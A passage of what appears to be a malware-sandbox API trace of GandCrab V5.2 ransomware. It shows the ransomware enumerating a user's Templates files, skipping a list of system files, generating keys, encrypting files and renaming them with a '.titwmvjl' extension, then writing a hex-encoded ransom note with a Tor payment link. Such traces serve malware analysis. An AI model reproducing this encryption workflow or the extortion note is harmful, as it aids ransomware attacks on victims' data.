pbData=0x2630100*, pdwDataLen=0x259ec08*=0xc8, dwBufLen=0x100 | out: pbData=0x2630100*, pdwDataLen=0x259ec08*=0x100) returned 1 [0073.770] GetLastError () returned 0x0 [0073.770] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0073.770] CryptDestroyKey (hKey=0x5034f8) returned 1 [0073.771] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0073.771] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0073.771] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x2640000 [0073.771] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x2750000 [0073.771] ReadFile (in: hFile=0x2c4, lpBuffer=0x2640000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x259ecb4, lpOverlapped=0x0 | out: lpBuffer=0x2640000*, lpNumberOfBytesRead=0x259ecb4*=0x5cc66, lpOverlapped=0x0) returned 1 [0073.812] SetFilePointerEx (in: hFile=0x2c4, liDistanceToMove=0xfffa339a, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0073.812] WriteFile (in: hFile=0x2c4, lpBuffer=0x2750000*, nNumberOfBytesToWrite=0x5cc66, lpNumberOfBytesWritten=0x259ec98, lpOverlapped=0x0 | out: lpBuffer=0x2750000*, lpNumberOfBytesWritten=0x259ec98*=0x5cc66, lpOverlapped=0x0) returned 1 [0073.830] WriteFile (in: hFile=0x2c4, lpBuffer=0x2630000*, nNumberOfBytesToWrite=0x21c, lpNumberOfBytesWritten=0x259ec98, lpOverlapped=0x0 | out: lpBuffer=0x2630000*, lpNumberOfBytesWritten=0x259ec98*=0x21c, lpOverlapped=0x0) returned 1 [0073.832] VirtualFree (lpAddress=0x2640000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0073.836] VirtualFree (lpAddress=0x2750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0073.837] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0073.837] CloseHandle (hObject=0x2c4) returned 1 [0073.843] MoveFileExW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\Cashflow analysis.xltm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\templates\\cashflow analysis.xltm"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\Cashflow analysis.xltm.titwmvjl" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\templates\\cashflow analysis.xltm.titwmvjl"), dwFlags=0x1) returned 1 [0073.843] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0073.844] FindNextFileW (in: hFindFile=0x503478, lpFindFileData=0x259ed68 | out: lpFindFileData=0x259ed68) returned 1 [0073.844] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2=".") returned 1 [0073.844] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2="..") returned 1 [0073.844] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\", lpString2="d2ca4a09d2ca4deb61a.lock" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\d2ca4a09d2ca4deb61a.lock") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\d2ca4a09d2ca4deb61a.lock" [0073.844] lstrlenW (lpString=".titwmvjl") returned 9 [0073.844] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\d2ca4a09d2ca4deb61a.lock") returned 82 [0073.844] VirtualAlloc (lpAddress=0x0, dwSize=0xe4, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0073.844] wsprintfW (in: param_1=0x25d0000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\d2ca4a09d2ca4deb61a.lock.titwmvjl") returned 91 [0073.844] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\d2ca4a09d2ca4deb61a.lock") returned 82 [0073.844] lstrlenW (lpString=".lock") returned 5 [0073.844] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0073.844] wsprintfW (in: param_1=0x2630000, param_2="%ws " | out: param_1=".lock ") returned 6 [0073.844] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0073.844] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0073.845] FindNextFileW (in: hFindFile=0x503478, lpFindFileData=0x259ed68 | out: lpFindFileData=0x259ed68) returned 1 [0073.845] lstrcmpW (lpString1="Email Insights.xltm", lpString2=".") returned 1 [0073.845] lstrcmpW (lpString1="Email Insights.xltm", lpString2="..") returned 1 [0073.845] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\", lpString2="Email Insights.xltm" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\Email Insights.xltm") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\Email Insights.xltm" [0073.845] lstrlenW (lpString=".titwmvjl") returned 9 [0073.845] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\Email Insights.xltm") returned 77 [0073.845] VirtualAlloc (lpAddress=0x0, dwSize=0xda, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0073.845] wsprintfW (in: param_1=0x25d0000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\Email Insights.xltm.titwmvjl") returned 86 [0073.845] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\Email Insights.xltm") returned 77 [0073.845] lstrlenW (lpString=".xltm") returned 5 [0073.845] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0073.845] wsprintfW (in: param_1=0x2630000, param_2="%ws " | out: param_1=".xltm ") returned 6 [0073.845] lstrcmpiW (lpString1=".xltm", lpString2=".titwmvjl") returned 1 [0073.845] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0073.845] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\Email Insights.xltm") returned 77 [0073.845] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\Email Insights.xltm") returned 77 [0073.845] lstrcmpiW (lpString1="Email Insights.xltm", lpString2="desktop.ini") returned 1 [0073.845] lstrcmpiW (lpString1="Email Insights.xltm", lpString2="autorun.inf") returned 1 [0073.845] lstrcmpiW (lpString1="Email Insights.xltm", lpString2="ntuser.dat") returned -1 [0073.845] lstrcmpiW (lpString1="Email Insights.xltm", lpString2="iconcache.db") returned -1 [0073.845] lstrcmpiW (lpString1="Email Insights.xltm", lpString2="bootsect.bak") returned 1 [0073.845] lstrcmpiW (lpString1="Email Insights.xltm", lpString2="boot.ini") returned 1 [0073.845] lstrcmpiW (lpString1="Email Insights.xltm", lpString2="ntuser.dat.log") returned -1 [0073.845] lstrcmpiW (lpString1="Email Insights.xltm", lpString2="thumbs.db") returned -1 [0073.846] lstrcmpiW (lpString1="Email Insights.xltm", lpString2="TITWMVJL-DECRYPT.txt") returned -1 [0073.846] lstrcmpiW (lpString1="Email Insights.xltm", lpString2="TITWMVJL-DECRYPT.html") returned -1 [0073.846] lstrcmpiW (lpString1="Email Insights.xltm", lpString2="KRAB-DECRYPT.html") returned -1 [0073.846] lstrcmpiW (lpString1="Email Insights.xltm", lpString2="CRAB-DECRYPT.html") returned 1 [0073.846] lstrcmpiW (lpString1="Email Insights.xltm", lpString2="KRAB-DECRYPT.txt") returned -1 [0073.846] lstrcmpiW (lpString1="Email Insights.xltm", lpString2="CRAB-DECRYPT.txt") returned 1 [0073.846] lstrcmpiW (lpString1="Email Insights.xltm", lpString2="ntldr") returned -1 [0073.846] lstrcmpiW (lpString1="Email Insights.xltm", lpString2="NTDETECT.COM") returned -1 [0073.846] lstrcmpiW (lpString1="Email Insights.xltm", lpString2="Bootfont.bin") returned 1 [0073.846] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\Email Insights.xltm") returned 77 [0073.846] lstrlenW (lpString=".xltm") returned 5 [0073.846] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0073.846] wsprintfW (in: param_1=0x2630000, param_2="%s " | out: param_1=".xltm ") returned 6 [0073.846] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0073.846] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0073.846] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\Email Insights.xltm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\templates\\email insights.xltm"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x2c4 [0073.847] SetFilePointerEx (in: hFile=0x2c4, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0073.847] ReadFile (in: hFile=0x2c4, lpBuffer=0x2630000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x259ecb4, lpOverlapped=0x0 | out: lpBuffer=0x2630000*, lpNumberOfBytesRead=0x259ecb4*=0x21c, lpOverlapped=0x0) returned 1 [0073.858] SetFilePointerEx (in: hFile=0x2c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0073.858] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0073.859] CryptAcquireContextW (in: phProv=0x259ebe4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259ebe4*=0x4cdb38) returned 1 [0073.859] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2640000 [0073.859] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0073.859] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0073.859] CryptGenRandom (in: hProv=0x4cdb38, dwLen=0x20, pbBuffer=0x259ec70 | out: pbBuffer=0x259ec70) returned 1 [0073.859] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0073.860] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0073.860] VirtualFree (lpAddress=0x2640000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0073.860] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0073.860] CryptAcquireContextW (in: phProv=0x259ebe4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259ebe4*=0x4cdb38) returned 1 [0073.860] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2640000 [0073.860] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0073.861] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0073.861] CryptGenRandom (in: hProv=0x4cdb38, dwLen=0x8, pbBuffer=0x259ec90 | out: pbBuffer=0x259ec90) returned 1 [0073.861] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0073.861] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0073.861] VirtualFree (lpAddress=0x2640000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0073.861] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0073.861] CryptAcquireContextW (in: phProv=0x259ebd8, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259ebd8*=0x4cdb38) returned 1 [0073.861] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0073.862] CryptImportKey (in: hProv=0x4cdb38, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259ebdc | out: phKey=0x259ebdc*=0x5031f8) returned 1 [0073.862] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0073.862] CryptGetKeyParam (in: hKey=0x5031f8, dwParam=0x8, pbData=0x259ebd0, pdwDataLen=0x259ebd4, dwFlags=0x0 | out: pbData=0x259ebd0*=0x800, pdwDataLen=0x259ebd4*=0x4) returned 1 [0073.862] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0073.862] CryptEncrypt (in: hKey=0x5031f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2630000*, pdwDataLen=0x259ec08*=0xc8, dwBufLen=0x100 | out: pbData=0x2630000*, pdwDataLen=0x259ec08*=0x100) returned 1 [0073.862] GetLastError () returned 0x0 [0073.862] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0073.863] CryptDestroyKey (hKey=0x5031f8) returned 1 [0073.863] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0073.863] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0073.863] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0073.863] CryptAcquireContextW (in: phProv=0x259ebd8, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259ebd8*=0x4cdb38) returned 1 [0073.863] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0073.864] CryptImportKey (in: hProv=0x4cdb38, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259ebdc | out: phKey=0x259ebdc*=0x5034f8) returned 1 [0073.864] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0073.864] CryptGetKeyParam (in: hKey=0x5034f8, dwParam=0x8, pbData=0x259ebd0, pdwDataLen=0x259ebd4, dwFlags=0x0 | out: pbData=0x259ebd0*=0x800, pdwDataLen=0x259ebd4*=0x4) returned 1 [0073.864] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0073.864] CryptEncrypt (in: hKey=0x5034f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2630100*, pdwDataLen=0x259ec08*=0xc8, dwBufLen=0x100 | out: pbData=0x2630100*, pdwDataLen=0x259ec08*=0x100) returned 1 [0073.864] GetLastError () returned 0x0 [0073.864] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0073.864] CryptDestroyKey (hKey=0x5034f8) returned 1 [0073.864] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0073.865] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0073.865] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x2640000 [0073.865] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x2750000 [0073.865] ReadFile (in: hFile=0x2c4, lpBuffer=0x2640000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x259ecb4, lpOverlapped=0x0 | out: lpBuffer=0x2640000*, lpNumberOfBytesRead=0x259ecb4*=0xb431d, lpOverlapped=0x0) returned 1 [0073.915] SetFilePointerEx (in: hFile=0x2c4, liDistanceToMove=0xfff4bce3, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0073.915] WriteFile (in: hFile=0x2c4, lpBuffer=0x2750000*, nNumberOfBytesToWrite=0xb431d, lpNumberOfBytesWritten=0x259ec98, lpOverlapped=0x0 | out: lpBuffer=0x2750000*, lpNumberOfBytesWritten=0x259ec98*=0xb431d, lpOverlapped=0x0) returned 1 [0073.920] WriteFile (in: hFile=0x2c4, lpBuffer=0x2630000*, nNumberOfBytesToWrite=0x21c, lpNumberOfBytesWritten=0x259ec98, lpOverlapped=0x0 | out: lpBuffer=0x2630000*, lpNumberOfBytesWritten=0x259ec98*=0x21c, lpOverlapped=0x0) returned 1 [0073.921] VirtualFree (lpAddress=0x2640000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0073.925] VirtualFree (lpAddress=0x2750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0073.927] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0073.928] CloseHandle (hObject=0x2c4) returned 1 [0073.937] MoveFileExW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\Email Insights.xltm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\templates\\email insights.xltm"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\Email Insights.xltm.titwmvjl" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\templates\\email insights.xltm.titwmvjl"), dwFlags=0x1) returned 1 [0073.938] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0073.938] FindNextFileW (in: hFindFile=0x503478, lpFindFileData=0x259ed68 | out: lpFindFileData=0x259ed68) returned 1 [0073.938] lstrcmpW (lpString1="LiveContent", lpString2=".") returned 1 [0073.938] lstrcmpW (lpString1="LiveContent", lpString2="..") returned 1 [0073.938] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\", lpString2="LiveContent" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent" [0073.938] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\" [0073.938] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x25d0000 [0073.939] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0073.939] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0073.939] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0073.939] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0073.939] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0073.939] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0073.939] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0073.940] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0073.940] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0073.940] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0073.940] wsprintfW (in: param_1=0x25d0200, param_2="%s\\%s-DECRYPT.txt" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\\\TITWMVJL-DECRYPT.txt") returned 91 [0073.940] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\\\TITWMVJL-DECRYPT.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\templates\\livecontent\\titwmvjl-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2c4 [0073.941] lstrlenW (lpString="\xfeff\x2d\x2d\x2d\x3d\x20\x20\x20\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x56\x35\x2e\x32\x20\x20\x20\x20\x3d\x2d\x2d\x2d\x20\x0d\x0a\x0d\x0a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x55\x4e\x44\x45\x52\x20\x4e\x4f\x20\x43\x49\x52\x43\x55\x4d\x53\x54\x41\x4e\x43\x45\x53\x20\x44\x4f\x20\x4e\x4f\x54\x20\x44\x45\x4c\x45\x54\x45\x20\x54\x48\x49\x53\x20\x46\x49\x4c\x45\x2c\x20\x55\x4e\x54\x49\x4c\x20\x41\x4c\x4c\x20\x59\x4f\x55\x52\x20\x44\x41\x54\x41\x20\x49\x53\x20\x52\x45\x43\x4f\x56\x45\x52\x45\x44\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x09\x2a\x2a\x2a\x2a\x2a\x46\x41\x49\x4c\x49\x4e\x47\x20\x54\x4f\x20\x44\x4f\x20\x53\x4f\x2c\x20\x57\x49\x4c\x4c\x20\x52\x45\x53\x55\x4c\x54\x20\x49\x4e\x20\x59\x4f\x55\x52\x20\x53\x59\x53\x54\x45\x4d\x20\x43\x4f\x52\x52\x55\x50\x54\x49\x4f\x4e\x2c\x20\x49\x46\x20\x54\x48\x45\x52\x45\x20\x41\x52\x45\x20\x44\x45\x43\x52\x59\x50\x54\x49\x4f\x4e\x20\x45\x52\x52\x4f\x52\x53\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x41\x74\x74\x65\x6e\x74\x69\x6f\x6e\x21\x20\x0d\x0a\x0d\x0a\x41\x6c\x6c\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2c\x20\x64\x6f\x63\x75\x6d\x65\x6e\x74\x73\x2c\x20\x70\x68\x6f\x74\x6f\x73\x2c\x20\x64\x61\x74\x61\x62\x61\x73\x65\x73\x20\x61\x6e\x64\x20\x6f\x74\x68\x65\x72\x20\x69\x6d\x70\x6f\x72\x74\x61\x6e\x74\x20\x66\x69\x6c\x65\x73\x20\x61\x72\x65\x20\x65\x6e\x63\x72\x79\x70\x74\x65\x64\x20\x61\x6e\x64\x20\x68\x61\x76\x65\x20\x74\x68\x65\x20\x65\x78\x74\x65\x6e\x73\x69\x6f\x6e\x3a\x20\x2e\x54\x49\x54\x57\x4d\x56\x4a\x4c\x20\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x6f\x6e\x6c\x79\x20\x6d\x65\x74\x68\x6f\x64\x20\x6f\x66\x20\x72\x65\x63\x6f\x76\x65\x72\x69\x6e\x67\x20\x66\x69\x6c\x65\x73\x20\x69\x73\x20\x74\x6f\x20\x70\x75\x72\x63\x68\x61\x73\x65\x20\x61\x6e\x20\x75\x6e\x69\x71\x75\x65\x20\x70\x72\x69\x76\x61\x74\x65\x20\x6b\x65\x79\x2e\x20\x4f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x67\x69\x76\x65\x20\x79\x6f\x75\x20\x74\x68\x69\x73\x20\x6b\x65\x79\x20\x61\x6e\x64\x20\x6f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x72\x65\x63\x6f\x76\x65\x72\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2e\x0d\x0a\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x73\x65\x72\x76\x65\x72\x20\x77\x69\x74\x68\x20\x79\x6f\x75\x72\x20\x6b\x65\x79\x20\x69\x73\x20\x69\x6e\x20\x61\x20\x63\x6c\x6f\x73\x65\x64\x20\x6e\x65\x74\x77\x6f\x72\x6b\x20\x54\x4f\x52\x2e\x20\x59\x6f\x75\x20\x63\x61\x6e\x20\x67\x65\x74\x20\x74\x68\x65\x72\x65\x20\x62\x79\x20\x74\x68\x65\x20\x66\x6f\x6c\x6c\x6f\x77\x69\x6e\x67\x20\x77\x61\x79\x73\x3a\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x7c\x20\x30\x2e\x20\x44\x6f\x77\x6e\x6c\x6f\x61\x64\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x2d\x20\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x74\x6f\x72\x70\x72\x6f\x6a\x65\x63\x74\x2e\x6f\x72\x67\x2f\x20\x0d\x0a\x0d\x0a\x7c\x20\x31\x2e\x20\x49\x6e\x73\x74\x61\x6c\x6c\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x32\x2e\x20\x4f\x70\x65\x6e\x20\x54\x6f\x72\x20\x42\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x33\x2e\x20\x4f\x70\x65\x6e\x20\x6c\x69\x6e\x6b\x20\x69\x6e\x20\x54\x4f\x52\x20\x62\x72\x6f\x77\x73\x65\x72\x3a\x20\x20\x20\x68\x74\x74\x70\x3a\x2f\x2f\x67\x61\x6e\x64\x63\x72\x61\x62\x6d\x66\x65\x36\x6d\x6e\x65\x66\x2e\x6f\x6e\x69\x6f\x6e\x2f\x39\x39\x38\x61\x32\x66\x34\x35\x64\x32\x63\x61\x34\x64\x65\x66\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x7c\x20\x34\x2e\x20\x46\x6f\x6c\x6c\x6f\x77\x20\x74\x68\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x74\x68\x69\x73\x20\x70\x61\x67\x65\x20\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x4f\x6e\x20\x6f\x75\x72\x20\x70\x61\x67\x65\x20\x79\x6f\x75\x20\x77\x69\x6c\x6c\x20\x73\x65\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x70\x61\x79\x6d\x65\x6e\x74\x20\x61\x6e\x64\x20\x67\x65\x74\x20\x74\x68\x65\x20\x6f\x70\x70\x6f\x72\x74\x75\x6e\x69\x74\x79\x20\x74\x6f\x20\x64\x65\x63\x72\x79\x70\x74\x20\x31\x20\x66\x69\x6c\x65\x20\x66\x6f\x72\x20\x66\x72